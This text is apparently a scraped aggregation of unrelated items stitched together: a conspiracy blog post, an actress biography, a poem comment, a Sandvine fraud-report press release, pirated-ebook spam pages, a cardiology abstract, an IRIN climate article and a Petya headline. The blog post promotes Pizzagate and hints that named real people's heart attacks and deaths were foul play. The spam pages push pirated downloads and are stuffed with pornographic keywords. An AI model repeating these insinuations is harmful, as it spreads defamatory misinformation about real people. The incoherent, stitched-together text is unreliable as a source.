So much for theories that the FBI was ready to make mass arrests of prominent Washington figures related to Pizzagate.  Has any "mass arrest" Internet story ever panned out?  

Maybe it has:
Donald Trump became president on Jan. 20. And in one short month, there were more than 1,500 arrests for sex crimes ranging from trafficking to pedophilia.  
Big deal? You bet. In all of 2014, there were fewer than 400 sex trafficking-related arrests, according to FBI crime statistics. Liz Crokin at TownHall.com has put together a great piece on the push by the Trump administration to crack down on sex crimes. And she notes that while "this should be one of the biggest stories in the national news... the mainstream media has barely, if at all, covered any of these mass pedophile arrests. This begs the question – why?
This may have nothing to do with Trump-- in fact, it's likely it doesn't-- since these kinds of actions are planned out months in advance. The arrests continue, in case you were wondering, with major busts going down on a near-weekly basis. Someone's cleaning house. 

For what it's worth, I always reckoned that Pizzagate was in fact cover/distraction for a more hidden struggle, one that would take place under the radar*. As I noted back in November:

No one is saying as much but this very much feels connected to a deeper, more covert war. 
Why would I say such a thing? Because at the same time the Pizzagate story went dark we've seen major strikes taken against international pedophilia, which actually is a global conspiracy, with its own networks, secret codes and moles within established centers of power such as schools, police departments and governments.  
With such combustible accusations-- and such potential for a scandal that could quickly spread out of control (ie., involve political figures you're not trying to destroy)-- you'd naturally expect the action to go dark and the fall guys to be placed pretty far down the foodchain. (Remember that a prior investigation bagged one of the most powerful people in Washington at one time, former Speaker of the House Dennis Hastert).†


"EVER WONDER WHAT IT'D BE LIKE TO DIE IN A PLANE CRASH?" 



It may be sheer coincidence, but James Alefantis' former partner suffered a major heart attack this week
Media Matters for America founder David Brock was rushed to a hospital on Tuesday after suffering a heart attack. 
According to a press release from MMA, the founder of the liberal media watchdog and analysis website was rushed to the hospital early Tuesday afternoon and received treatment.
Sure, it may be coincidence. But I couldn't help but remember this story, published soon after the election
Dems to David Brock: Stop Helping, You Are Killing Us 
Democrats know they need someone to lead them out of the wilderness. But, they say, that someone is not David Brock.

As David Brock attempts to position himself as a leader in rebuilding ademoralized Democratic Party in the age of Trump, many leading Democratic organizers and operatives are wishing the man would simply disappear.
 
"Disappear." Huh. 
Many in the party—Clinton loyalists, Obama veterans, and Bernie supporters alike—talk about the man not as a sought-after ally in the fight against Trumpism, but as a nuisance and a hanger-on, overseeing a colossal waste of cash. And former employees say that he has hurt the cause.
It's worth remembering that Breitbart.com Andrew Breitbart died of a heart attack at the age of 43. A year before he'd posted a cryptic tweet that some have since linked to the Pizzagate imbroglio.  Just before his death he hyped some revelation about Barack Obama's past. 

A coroner in the office handling Breitbart's body subsequently died of arsenic poisoning. The day Breitbart's autopsy results were revealed, in fact.

COME BACK ROY COHN, ALL IS FORGIVEN


We also saw James Comey revive Russiagate, which had been flatlining after Vault 7. Any illusions among Trump fans that the FBI was secretly on their side were ground into powder, between this revelation and the Pizzagate conspiracy investigations. 

One can't help but wonder if the New Praetorians (I've noticed that the Praetorian meme has been picked up by more prominent commentators, but you heard it here first) are losing their last shred of patience with Donald Trump's shenanigans and are planning imminent regime change: 
WASHINGTON (AP) — The FBI is investigating whether Donald Trump’s associates coordinated with Russian officials in an effort to sway the 2016 presidential election, Director James Comey said Monday in an extraordinary public confirmation of a probe the president has refused to acknowledge, dismissed as fake news and blamed on Democrats. 
In a bruising five-hour session, the FBI director also knocked down Trump’s claim that his predecessor had wiretapped his New York skyscraper, an assertion that has distracted White House officials and frustrated fellow Republicans who acknowledge they’ve seen no evidence to support it.
How surreal is the world in which you know live in? So much so that mainstream political site The Hill is comparing the action in Washington to a Stanley Kubrick film, one which has become notorious for the conspiracy theories that have been projected onto it (and is well familiar to Synchronauts):
On the 40th anniversary of the publication of The Shining, Stephen King must be wondering if Washington is working on its own sequel. For the last couple months, Washington has been on edge, like we are all trapped in Overlook Hotel with every day bringing a new “jump scare,” often preceded by a telltale tweet. Indeed, a Twitter whistle has replaced suspenseful music to put the entire city on the edge of their seats. 
In this Shining sequel, however, people are sharply divided on who is the deranged ax-wielding villain in this lodge, the president or the press. Ironically, with the recent disclosure that some of the Trump campaign may indeed have been subject to surveillance, the president is looking more like Danny Torrence, a character dismissed for constantly muttering “redrum, redrum” until someone finally looked in a mirror at the reverse image to see the true message.
Yeah, I'm not really feeling that metaphor there, but whatever. It's been that kind of year.

Now the Internet is burning up with theories that disgraced National Security Adviser Michael Flynn has "turned" and is going to testify against the Trump Administration, or at least figures attached to it. 


It's hard to imagine a three-star general can be stupid enough to be guilty of things Flynn's been accused of but that may speak to a culture of impunity in Washington, in which your misdeeds are only punished if you get on the wrong side of the wrong people.

LIKE A BAD CYBERPUNK NOVEL


One wonders if the secret war has spread outside Washington. Car service giant Uber seems to be having a major run of rotten luck lately: 
Uber Technologies Inc. is suspending its self-driving car program after one of its autonomous vehicles was involved in a high-impact crash in Tempe, Arizona, the latest incident for a company reeling from multiple crises. 
In a photo posted on Twitter, one of Uber’s Volvo self-driving SUVs is pictured on its side next to another car with dents and smashed windows. An Uber spokeswoman confirmed the incident, and the veracity of the photo, and added that the ride-hailing company is suspending its autonomous tests in Arizona until it completes its investigation and pausing its Pittsburgh operations.

The incident also comes as Uber, and Chief Executive Officer Travis Kalanick, are currently under scrutiny because of a series of scandals. The ride-hailing company has been accused of operating a sexist workplace. This month, the New York Times reported that Uber used a tool called Greyball to help drivers evade government regulators and enforcement officials. Kalanick said he needed "leadership help" after Bloomberg published a video showing him arguing with an Uber driver.
So who did Kalanick piss off? 

Coincidentally- there's that word again- the crash comes soon after Wikileaks revealed that CIA hackers had the ability to override the computer systems in automobiles. From Mashable:

WikiLeaks has published a trove of files it says are linked to the CIA's hacking operations — which apparently includes efforts to hack into cars.  
The first in a series called "Vault 7," "Year Zero" supposedly comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA's Center for Cyber Intelligence in Langley, Virginia.  
"Year Zero" details the CIA's malware arsenal and "zero day" exploits against Apple iPhones, Google's Android operating system, Microsoft Windows and even Samsung TVs.  
 According to a document from 2014, the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks. 
Oh, that's reassuring. Speaking of control systems, apparently pimps are controlling prostitutes with RFID chips:
It turns out this 20-something woman was being pimped out by her boyfriend, forced to sell herself for sex and hand him the money. 
 “It was a small glass capsule with a little almost like a circuit board inside of it,” he said. “It's an RFID chip. It's used to tag cats and dogs. And someone had tagged her like an animal, like she was somebody's pet that they owned.” 
This is human trafficking. It’s a marginal issue here in the U.S. for most of us. Part of that is because the average person isn’t sure what human trafficking – or modern day slavery – actually means.
Technology is our friend, right? And now this: 
Turkish Hackers Threaten To Wipe Millions Of iPhones; Demand Ransom From Apple 
Today, courtesy of CIO, we learn that a group of hackers referring to themselves as the "Turkish Crime Family", has been in direct contact with Apple and is demanding a $150,000 ransom by April 7th or they will proceed to wipe as many as 600 million apple devices for which they allegedly have passwords. 
The group said via email that it has had a database of about 519 million iCloud credentials for some time, but did not attempt to sell it until now. The interest for such accounts on the black market has been low due to security measures Apple has put in place in recent years, it said.

Since announcing its plan to wipe devices associated with iCloud accounts, the group claimed that other hackers have stepped forward and shared additional account credentials with them, putting the current number it holds at over 627 million.

According to the hackers, over 220 million of these credentials have been verified to work and provide access to iCloud accounts that don't have security measures like two-factor authentication turned on.
 
Of course, if credible, with an ask of just $150k, this is the most modest group of hackers we've ever come across.
Given the war that's erupted between the increasingly aggressive Turkish government and the EU, money may clearly not be the object here. Turkish PM Erdogan is clearly set on reconstructing the old Ottoman Empire and shivving Apple might just be part of the march.

Besides, Turkey is taking that recent coup attempt-- which is almost universally blamed on the CIA-- very personally.


Speaking of the EU, we've seen stories that Trump advisor Steve Bannon wants to dissolve the union. Which may be why Trump-adversary John McCain announced his unalloyed support for it- and the "New World Order" (his words, not mine):
The world "cries out for American and European leadership" through the EU and Nato, US senator John McCain said on Friday (24 March). 
In a "new world order under enormous strain" and in "the titanic struggle with forces of radicalism … we can't stand by and lament, we've got to be involved," said McCain, a former Republican presidential candidate who is now chairman of the armed services committee in the US Senate. 
Speaking at the Brussels Forum, a conference organised by the German Marshall Fund, a transatlantic think tank, he said that the EU and the US needed to develop "more cooperation, more connectivity". 
"I trust the EU," he said, defending an opposite view from that of US president Donald Trump, who said in January that the UK "was so smart in getting out" of the EU and that Nato was "obsolete". 
He said that the EU was "one of the most important alliances" for the US and that the EU and Nato were "the best two sums in history", which have maintained peace for the last 70 years. "We need to rely on Nato and have a Nato that adjusts to new challenges," he said.
Would McCain speak this way to a domestic audience? Of course not. Or maybe he would- I can't tell which way is up anymore. But either way it's good to know where he really stands.

Like McCain, China continues to sound a similar note of support for globalization, on which its very economic survival so desperately depends:
Chinese Vice Premier Zhang Gaoli told a gathering of Asian leaders that the world must commit to multilateral free trade under the World Trade Organization and needs to reform global economic governance. 
“The river of globalization and free trade will always move forward with unstoppable momentum to the vast ocean of the global economy,” Zhang said. China will remain a strong force in the world economy and for peace and stability, he said, adding that countries must respect one another’s core interests and refrain from undermining regional stability. 
I suppose this is why China is off the target list for our new Cold (?) Warriors.

I've resisted posting on all this because it's all so depressing. I've actually written a few pieces on this chicanery that I ended up roundfiling. But I suppose I just wanted to go on the record about all this skullduggery, for posterity's sake.



UPDATE: Sex trafficking arrests and trials continue to proliferate. Most recent bust, an international ring in Minnesota. There is way too much activity going down in too short a time for this to be spontaneous.


* Which is exactly why I refrained from commenting on it here for the most part, instead noting that it had become a kind of memetic virus in much the same way that the Franklin/Boy's Town scandal had in the 90s. (Note that prior to the election-- and Pizzagate-- Trump nemesis the Washington Post was all over the issue of sex trafficking in the nation's capital). 

† The ongoing legal and police actions coinciding with the moves to shut down the Pizzagate fringes on the Web seem like the exact kind of action one would expect if there were a serious operation at work. Shutting down the Internet chatter makes perfect sense in this context because it can only complicate cases made by prosecutors. 
          Mary Wickes: A Suspected Treasure   
Mary Wickes was the original Mary Poppins on American television in 1949
From the start, like Bette Davis in Now Voyager, Paul Beals and I suspected that Mary Wickes might be a treasure.
We met her in the summer of 1976 when she was at the Hyatt-Regency in downtown Chicago promoting her short-lived CBS TV show, Doc.
What we didn’t know then is that Wickes, always marching to the beat of her own drummer, would get herself fired from that MTM Productions show by demanding the right to change dialogue she found distasteful.
Affable and chatty, the homely, beloved character actress seemed to be as direct, wisecracking and approachable as the maids and nurses she’d always played. Never a star, she was nevertheless a central figure in Hollywood since the 1930s. It was strange to hear her rattle off names like “Lucy,” “Orson” and “Bette,” seemingly not as an affectation, but simply because these were ordinary friends and colleagues of hers.
Like actor Lyle Talbot, whom I interviewed later, Wickes was one of those fascinating people who had almost literally been everywhere and known everyone.
“Whether nurse, nun or housekeeper, she was always the wry observer peering into a world that she did not entirely belong to,” wrote Steve Taravella in his biography Mary Wickes: I Know I’ve Seen That Face Before. “Intimately a part of whatever was taking place on screen or stage, she was at the same time an outsider — and it was clear to everyone that she had made her peace with this status. Although she was never the lead, she was the one who held my attention. Her persona resonated with me.”
Wickes was the beleaguered nurse in The Man Who Came to Dinner on stage and screen and the housekeeper inWhite Christmas. She was the original Mary Poppins on live television, and the animators’ model for Cruella de Vil in 101 Dalmatians.
Her long experience in comedy left her with a considerable bag of tricks. For example, she developed five variations on the “double take:” the Regular Double Take, the Pigeon Double Take (with neck stretched), the Butterfly Double Take (with multiple quick glances), the Triple Take (each growing in intensity) and the One Where You’re Caught (pretending you didn’t just do a double take).
---
Born in St. Louis in 1910, Wickes had a quasi-19th century horse-and-buggy childhood, taking family excursions on Mississippi riverboats. “Everybody took their own lunch in baskets,” she recalled. “If you got thirsty, you got a big, wonderful, cold stein if A&W root beer with a big head on it, a lot of foam. And that was lovely, oh my. That hurrying down to the levy to make the boat before it left was lovely.”
---
Beyond a curse or a blessing, Wickes’ homely looks were finally just a fact she used to her advantage.
“Some time or other, it always gets around to boys, and there was no boy in Mary’s life,” recalled family friend Mary Vahle. “She was always tall, and that’s a drawback. And Mary had a receding chin and a big nose. Boys that age don’t look beyond the surface.”
Taravella noted, “For decades, Mary withstood — as few others could — harsh public mockery regarding her appearance. Callous descriptions — ‘the wrinkle with lips’ is how one character refers to her in a 1990s sitcom — became so routine that they limited Mary’s career in ways she found hard to accept… (But) Mary’s appearance more than enhanced her career; in some ways, it allowed her to have one. Together, her height, her pronounced nose, her receding chin and her attention-grabbing bark drew the notice of casting directors. Such was true from the very beginning.”
Writer and actor Peter Walker said, “I don’t know if Mary ever realized that she was such a homely woman. But it was that homely thing that obviously got her the work. She knew that (her appearance and voice) was where her money was coming from, that she was never going to be the Claire Trevor or the pretty second leading lady. As a businesswoman she was very wise, and she kept her mother and herself very well.”
Never married, Wickes lived with her widowed mother Isabella, and they made a lively and devoted pair.
---
Though notoriously frugal, Wickes did not stint when it came to entertaining at home.
“Be it lunch, dinner or the afternoon teas she liked to arrange, she was a lavish, generous host who offered liquor and hearty amounts of food, most of which she prepared herself,” Taravella wrote.
“She served with family crystal and silver, and she went out of her way to make her guests comfortable. The food she served was distinctly Midwestern. No matter how famous the guest, Mary’s meals were likely to include chicken salad or chili, homemade brownies and Jell-O. She liked to prepare an appetizer that she called actor’s pâté made of liverwurst, cream cheese, chives, Worcester sauce and dry mustard.”
---
Wickes was a long-time professional colleague of Bette Davis, a good friend of Doris Day and Vivian Vance and a really close friend of Lucille Ball (who somewhat exploited that friendship by underpaying Mary for appearances on her sitcoms).
Though disappointed that she didn’t land the role of Ethel Mertz on I Love Lucy, Wickes became something of a real-life Ethel in occasional antics with Lucy. After Lucy bought a Rolls-Royce that had been owned by her late neighbor Hedda Hopper, the pair had a misadventure while out for a drive when they realized, as darkness fell, that they didn’t know how to turn on the headlights.
Then there was the time Lucy took Wickes shopping for sheets and pillowcases along with a baby chimpanzee Lucy adored. Recalling how Lucy refused to take her own children out in public for fear of being mobbed, her daughter Lucie Arnaz said, “She wouldn’t take me to the market, but she’d take a chimpanzee and a six-foot-tall woman in a long plaid skirt because God forbid she should draw any attention to herself.”
The affection between Lucy and Wickes ran deep, and is evident in the tone of the many letters they exchanged.
In 1973, while caring for Wickes’ plants while she was away, Lucy wrote, “Your plants are thriving, but they ask for you and wonder why you don’t drop by. I think one of them is pregnant if you have any instructions concerning same.”
“If you don’t want to come yourself, Mary, take pity on poor Isabell and let her get drunk once in a while,” Lucy wrote in 1958, inviting Wickes to a party. “You’re much too hard on her. I understand you have ruined her sex life.”
The quip was one few but Lucy could have gotten away with, because Wickes’ moral views were frequently described as Victorian. “In the old days, people who had character didn’t change it with every person they met,” Lucie Arnaz said. “They didn’t change to fit the style or the clothes or to fit the mood, to be hip or whatever. They were who they were. Mary had that in her own character. She had it all her life.”
Wickes caused herself no end of trouble rejecting what she regarded as “blue” material in scripts. But her tolerance could also surprise. Many of her escorts were gay men. “Her notes reveal that — at least with regard to gifts — Mary treated her friends in same-sex relationships the same as her friends in heterosexual relationships,” Taravella wrote.
Perhaps that’s because one of Wickes’ enduring principles was loyalty. Stefan Kanfer, in his biography Ball of Fire, noted how Wickes always looked out for Lucy. “(Wickes) was acting in summer stock in 1979 when she persuaded Lucy to fly to San Francisco for a sentimental journey,” he wrote. “Together the two old friends called on a bedridden Vivian Vance. Most of the day was spent in happy reminiscence between Lucy and Vivian, with Mary off in a corner. The laughter lasted for two hours; afterward the visitors cried all the way to the airport. Vance died that August.”
---
For all that, Wickes remained a guarded figure, in some ways unknowable.
“Mary lived behind walls, not merely walls against unpleasantness … but also walls of secrecy about her health; walls of fear about her (right-wing) political leanings being discovered; walls of lies about her age; walls, certainly, against physical intimacy,” Taravella wrote.
“These were walls of privacy so great that when friends wrote her apartment number on mail addressed to her, she was angered, fearing others might learn the precise location of her apartment.
“Most notably, she erected walls against any emotional closeness. Mary laughed and joked and told stories, but never really opened up — not even with her closest friends. In virtually every context, Mary placed limits on the warmth she would extend, so much so that emotional reticence is one of the first qualities friends mention when asked about her.”

Whatever Wickes had went straight into her work. She prided herself on her professionalism, badgered other theatrical professionals for assignments and was known to walk into rehearsal halls proclaiming, “It’s Mary Wickes, grand old lady of stage, screen and shortwave radio!”

          "Euphoria" by Major Jackson   
This poem has me wondering about the sexual exploits described in the second to last stance: "In rhythm to my hips' thrashing, in rhythm to Luther's voice, which flutters around that word I now mistake for "weep...". I was debating with a fellow about what exactly the girl did, did she have intercourse or did she help the guy master bate? As a teenager, I know that other teenagers do crazy things. But this poem has me so confused, the first lines describe how this teenage boy sees his mom smoking crack, but he's still, waiting in a Benz. I guess that shows that even wealthy, stable individuals struggle with the same vices of individuals of lower classes. In that part of the poem, Jackson also describes how the suspected prostitute is dressed, the environment they're surrounded in, and the experience they share together. To me, this poem describes a real life experience, maybe Jackson is the young man in the poem. Also, this poem is something I could see in a movie script, maybe this is the life of a young man, and somehow ends up leaving his city to find a different kind of life. But my favorite line is the last line: "A family, a dinner, a car, nothing but this happiness so hard to come by." If you're familiar with current slang, this sentence could have a dirty, as in a sexual, connotation. I have more to add, but maybe later. 
          Sandvine Fraud Detection Capabilities Help CSPs and Subscribers Maximize Benefit of Zero-Rating Plans   
Waterloo, ON; April 19, 2017 – Sandvine, (TSX:SVC) a leading provider of intelligent broadband network solutions for fixed and mobile operators, today released a Global Internet Phenomena Report Spotlight focusing on Zero-Rating fraud. The report is based on data collected from a tier-1 mobile access network and examines how some subscribers on the network are using HTTP header injection to commit fraud and exploit the operator’s decision to zero-rate their website and subscriber portal.
          Ebook Download The Sex Lives of US Presidents Free PDF Online   

0 - Free Download The Sex Lives of US Presidents Ebook Online PDF





Alternative Download Link - The Sex Lives  of US Presidents


Gratuit Lucy Li and Vanessa Decker Demolition for Sex Art Curvy ... Its not every day you see two beautiful babes doing demolition work. Its also not every day that Sex Art captures Lucy Li and Vanessa Decker playing with each ... Interracial Sex Tube Search (127757 videos) NudeVista 11:40 Sexy And Hard Sex With This Interracial Pair. hclips, interracial, milf, Same sex marriage Wikipedia Same sex marriage, also known as gay marriage, is marriage between people of the same sex, either as a secular civil ceremony or in a religious setting. Lucy Li is Naked in Bed! Big Tits and Big Boobs at ... Here's busty brunette Lucy Li naked on top of white sheets in bed. Looking at these photos makes me want to do two things. 1 Play with her boobs and 2 Jin ping mei er ai de nu li (2009) IMDb With Hikaru Wakana, Kaera Uehara, Serina Hayakawa, Winnie Leung. Like its predecessor, this no holds barred sequel from Hong Kong a piece of ultra exploitation ... VOA Special English Word List (1510 Words) Many Things English Vocabulary Word List VOA Special English Word List (1510 Words) HD Teen Sex pornsharing.com Hot ass teen girl Carmen Caliente and Jenna Ashley play with sex toys www.free6.com Scandinavias Biggest Free Sex Site ... Free sex, porn pics, pussy pics sex site. On Free6.com, you can watch the best free sex, porn pics and softcore porn for free. We have a massive selection of sex ... Zhao Li Ying DramaWiki D Addicts Profile. Name: Zhao Li Ying; English name: Zanilia Zhao; Profession: Actress; Birthdate: 1987 Oct 16 (age 29) Birthplace: Langfang, Hebei, China Alina Li Tube Search (1778 videos) NudeVista 08:00 Brunette Asian Alina Li Gives Stroke Job On Camera For Your ViewAlina Li, wetplace, asians, brunettes, 1 month Lucy Li Porn Videos Free Sex Movies Redtube Have you seen "BANGcom: Pussy Licking Teen Lesbians" where Lucy Li is fucking like hell? Watch it now on Redtube.com. Super Bowl LI Superbowl.com: The official source for Super Bowl event information, news, and history, from NFL.com. Lucy Li Horny Beauty Doing A Sextape Pornhub.com Watch Lucy Li Horny Beauty Doing A Sextape. Pornhub is the ultimate xxx porn and sex site. Alina Li Videos and Photos (353) at FreeOnes Watch Alina Li at FreeOnes Free sex videos, photo sets and biography. All Alina Li videos, pictures and more! Alina Li Porn Videos Free Sex Movies Redtube Have you seen "BANGBROS Petite Asian Teen Alina Li Loves Big Dick (bbe12422)" where Alina Li is fucking like hell? Watch it now on Redtube.com. Bills and Resolutions Kansas State Legislature SB1 Eliminating the reporting requirements for law enforcement agencies concerning civil asset seizures and forfeitures. SB2 Exempting the division of legislative ... Read/download The Sex Lives of US Presidents ebook full free online.

          Free Download Ninja Attack!: True Tales of Assassins, Samurai, and Outlaws Ebook Online PDF   

0 - Free Ninja Attack!: True Tales of Assassins, Samurai, and Outlaws Ebook Download Full





Alternative Download Link - Ninja Attack!: True Tales of Assassins, Samurai, and Outlaws


Gratuit Ultimate Ninja Attack 4 Android Apps on Google Play Ultimate Ninja Attack 4. ... Yo yo this is like the dopest game ever on android to be downloaded yo can u guys make naruto ultimate ninja storm ... Real Fight Ninja Attack on the App Store itunes.apple.com Real Fight Ninja Attack is a deadly warrior, skilled and trained by famous ninja Warriors of World Kung Fu Club. Ninja are trained in killing Zombies ... Play Ninja Attack, a free online game on Kongregate Kongregate free online game Ninja Attack Ninja Attack! Fight your way through swarms of zombies, how long can you last?. Play Ninja Attack Ninja attack Addicting Games This game allows you to kill the enemies and complete 3 levels making you a ninja warrior! Get to safety! This game allows you to kill the enemies and complete Stag Ninja Attack Table Tennis Racquet Buy Stag Ninja ... Offensive Playing style with Stag Ninja Attack Table Tennis Racquet It is top selling table tennis racquet in complete stag table tennis racket series. Ninja Escape! Puzzle Escape Room Seattle Ninja escape has live Escape Room Adventures in TWO Seattle Locations in Fremont Belltown. Find the clues, Solve the Puzzles and Escape the Room before time runs out. Ninja Attack! introduces dozens of unforgettable real life ninja straight out of the annals of Japanese historymany of whom are all but unknown outside their home ... Ninja Attack Samurai Battles BoardGameGeek Ninja saboteurs infiltrated our press department and inserted an incorrect component list for the upcoming Ninja Attack expansion set. We are very sorry! Ninja Attack Party Plates Warrior Dinner Plate Martial ... Ninja Attack Party Plates at KarateMart.com are a warrior dinner plate set that are perfect if you need martial arts paper plates for your next party! HowTo:Survive a ninja attack Uncyclopedia Fandom ... OK so you can't actually survive a ninja attack but this is a way of hopefully surviving for an extra few seconds. Hopefully you remember these helpful ... Ravelry: Amigurumi Ninja Attack! pattern by Karla Fitch Amigurumi Ninja Attack! by Karla Fitch. Welcome! You are browsing as a guest Would you like to see 28 projects made from this pattern and much more? Secret Ninja Attack Smashpedia Fandom powered by Wikia Secret Ninja Attack ( Shinobi no Hi Ougi, lit. "Shinobi's Secret Finishing Technique) is Greninja's Final Smash. Greninja will put a mat ... Ninja Attack Suikoden Wikia Fandom powered by Wikia Suikoden Edit. The Ninja attack deals 2x damage to one enemy. In it Kasumi uses an attack similar to the Shrike Rune and after she lands Kage and Fuma throw their ... Robot Unicorn Attack from Adult Swim Free Online Game Robot Unicorn Attack A Free Online Flash Game From Adult Swim. Click this; listen to the song; play the game. Trust us. The Last Samurai ninja attack [HD] The Last Samurai ninja attack [HD] pfoenix72. Loading ... Ninja Assassin Training scene HD Duration: 3:20. JMWproduction 1,254,749 views. 3:20. Ninja! Attack of the Clan by Arree Chung, Hardcover ... The Hardcover of the Ninja! Attack of the Clan by Arree Chung at Barnes ... his family surprises him with a fun ninja attack! Maxwell loves his playful ninja family. NINJA ATTACK! USC Wushu Nation Ninjutsu Training Drill: Keri (Kicks) Ninja Training Video Blog Duration: 3:56. Ninjutsu Bujinkan 153,571 views. 3:56. The Parkour Ninja ... Buy Samurai Battles: Ninja Attack Board Games ... Buy Samurai Battles: Ninja Attack for as low as $34.99. Compare game prices at BoardGamePrices.com, the web's largest comparison site for popular board games. Ninja Attack eCard Personalized Profile Pics ... JibJab Ninja Attack Image There aren't enough ninja attacks in day to day life. Change that by round house kicking a fun JibJab postable onto your friend's Facebook! Ninja Attack Paper Cups Ninja Party Cups Ninja Themed ... Ninja attack paper cups on sale at KarateMart.com. Buy ninja party cups and ninja themed paper cups today! Spy Gear Ninja Attack Ninja Stars : Target Find product information, ratings and reviews for Spy Gear Ninja Attack Ninja Stars online on Target.com. Ninja Attack Dinosaur King Fandom powered by Wikia Ninja Attack card. Attribute: Wind Sign: Scissors Owner: Rex Owen , Sheer (Space Pirates) Used By: Ace, Megaraptor; First Appearance: Escape from Zeta Point Ninja Attack Home Facebook Ninja Attack, Vientiane, Laos. 238 likes. Ninja Attack! is a Metal Band in Vientiane, Laos consisting of a broad variety of musicians around the world... Ninja Attack! Tuttle Publishing Ninja Attack! introduces dozens of unforgettable real life ninja straight out of the annals of Japanese historymany of whom are all but unknown outside their home ... Teenage Mutant Ninja Turtles Hack Attack Puzzle Game Play Teenage Mutant Ninja Turtles Ninja Hack Attack and other free online puzzle games on nick.com. How to Play: Use the mouse to drag wires to matching outlets. Ninja Attack Vintage Ninja Welcome to VINTAGE NINJA dedicated to old ninja movies from Japan's 60's boom to the 80s American exploitation craze and beyond, with a ton of vintage toys, comics ... Ninja Attack Tasty Planet Wiki Fandom powered by Wikia Ninja Attack is the third level of Feudal Japan in Tasty Planet Back for Seconds. Details... Play Super Ninja Sack Attack Game Here A Food Game on ... Description. In this Ninja Game your goal is to collect all of the food in each level by using your grappling hook to traverse different levels. Ninja! Attack of the Clan by Arree Chung Reviews ... Ninja! Attack of the Clan has 184 ratings and 38 reviews. Jillian said: Our favorite Ninja is back again in Attack of the Clan. Who is the clan? Samurai Battles: Ninja Attack Board Game BoardGameGeek The nature of warfare will change forever with Samurai Battles: Ninja Attack, the first expansion for the unique military history board game Samurai Battles. Read/download Ninja Attack!: True Tales of Assassins, Samurai, and Outlaws ebook full free online.

          VFX and Animation school and work exploitation   
I'm doing some basic research on 2 things: Visual effects and animation students or graduates who feel they were misled by the school they went to regarding vfx and animation jobs, their ability,...

[Summary only. Full text at site.]
          ANMCO/SIC Consensus Document: cardiology networks for outpatient heart failure care   
<span class="paragraphSection">Changing demographics and an increasing burden of multiple chronic comorbidities in Western countries dictate refocusing of heart failure (HF) services from acute in-hospital care to better support the long inter-critical out-of- hospital phases of HF. In Italy, as well as in other countries, needs of the HF population are not adequately addressed by current HF outpatient services, as documented by differences in age, gender, comorbidities and recommended therapies between patients discharged for acute hospitalized HF and those followed-up at HF clinics.The Italian Working Group on Heart Failure has drafted a guidance document for the organisation of a national HF care network. Aims of the document are to describe tasks and requirements of the different health system points of contact for HF patients, and to define how diagnosis, management and care processes should be documented and shared among health-care professionals.The document classifies HF outpatient clinics in three groups: (i) community HF clinics, devoted to management of stable patients in strict liaison with primary care, periodic re-evaluation of emerging clinical needs and prompt treatment of impending destabilizations, (ii) hospital HF clinics, that target both new onset and chronic HF patients for diagnostic assessment, treatment planning and early post-discharge follow-up. They act as main referral for general internal medicine units and community clinics, and (iii) advanced HF clinics, directed at patients with severe disease or persistent clinical instability, candidates to advanced treatment options such as heart transplant or mechanical circulatory support. Those different types of HF clinics are integrated in a dedicated network for management of HF patients on a regional basis, according to geographic features. By sharing predefined protocols and communication systems, these HF networks integrate multi-professional providers to ensure continuity of care and patient empowerment.In conclusion, This guidance document details roles and interactions of cardiology specialists, so as to best exploit the added value of their input in the care of HF patients and is intended to promote a more efficient and effective organization of HF services.</span>
          Young Fashion Model exploited by pervert Photog 4   
Watch Young Fashion Model exploited by pervert Photog 4 at XXXPorn.rs - best free online XXXPorn videos for you to enjoy.
          Melding science and tradition to tackle climate change   

In the latest of several partnerships between tradition and modern science aimed at improving resilience to climate change, pastoralists and meteorologists in Tanzania are working together to produce weather forecasts better suited to farmers.

The hope is that by drawing from both indigenous knowledge and contemporary weather forecasting techniques, crop yields could be increased.

“We wanted to see if the two can complement or supplement each other,” Isaac Yonah, a senior officer coordinating community meetings employed by the Tanzania Meteorological Agency (TMA), told IRIN by phone.

Using traditional indicators such as the movement of red ants, the flowering of mango and other trees, the migration of termites and patterns and colours in the sky, farmers in Sakala village of Ngorongoro District compare their two-weekly forecasts with those released by the TMA.

“This is done… to validate how accurate their forecast is and to come up with a consensus [forecast]. In the last three seasons, more than 80 percent accuracy in the findings has been witnessed,” said Yonah.

The project is a partnership between TMA, Hakikazi Catalyst (a non-profit organization), and the UK-based International Institute for Environment and Development (IIED).

“Strengthening such practices could enhance the resilience of communities which are most vulnerable to climate change. Upscaling the projects will see the knowledge gap between traditional and scientific bridged,” said Yonah.

Research published in Uganda in 2013 detailed 23 different indicators used by traditional forecasters to predict weather.

“Farmers would profit from weather forecasts provided by governmental institutions. This [marriage of the old and new] will enable farmers to make sound decisions on how to fully exploit the seasonal distribution of rainfall to improve and stabilize crop yields,” said Joshua Okonyo, author of the study Indigenous Knowledge of Seasonal Weather Forecasting.

The indicators cited included wind direction, cuckoo calls, and the timing of winged termites’ departure from their nests.

Working with the Nganyi community in Kenya

For the past five years in Kenya, government meteorologists have worked with the Nganyi community in the west of the country in a project carried out in collaboration with the Intergovernmental Authority on Development (IGAD) Climate Prediction and Application Centre (ICPAC).

The Nganyi observe bird migrations and other animal behaviour in their forecasts.

“After thorough research, we have noticed that these traditional indicators have a high scientific value that could be integrated with the local climate information,” said Laban Ogallo, the project’s coordinator.

“Since predicting weather within the tropics is a challenge to scientists, we wanted to learn how the [Nganyi] community has been doing it over the years. Their knowledge will be helpful,” Abraham Changara, chief meteorologist at the Kenya Meteorological Department, told IRIN.

As meteorologists are waking up to the value of traditional forecasting methods in adapting to climate change, it seems climate change itself poses a threat to the sustainability of these methods.

''There is rapid disappearance of plants and animals due to climate variability and human activities,” according to Weather Forecasting and Indigenous Knowledge Systems, published by Great Zimbabwe University.

“There are few elders aware of traditional methods of weather forecasting. This makes traditional weather forecast less reliable,'' the study added.

ho/am/cb

100125 201405231354240096.jpg Analysis Food Climate change Environment and Disasters Climate change, science and tradition IRIN KISUMU Angola Burkina Faso Burundi Benin Botswana DRC Congo, Republic of Côte d’Ivoire Cameroon Colombia Cape Verde Djibouti Eritrea Ethiopia Gabon Ghana Gambia Guinea Equatorial Guinea Guinea-Bissau Kenya Liberia Lesotho Morocco Madagascar Mali Mauritania Mauritius Malawi Mozambique Namibia Niger Nigeria Rwanda Seychelles Sudan Sierra Leone Senegal Somalia Sao Tome and Principe Swaziland Chad Togo Tanzania Uganda Samoa South Africa Zambia Zimbabwe
          Le ransomware Petya demande une rançon pour libérer les données d'un PC infecté   
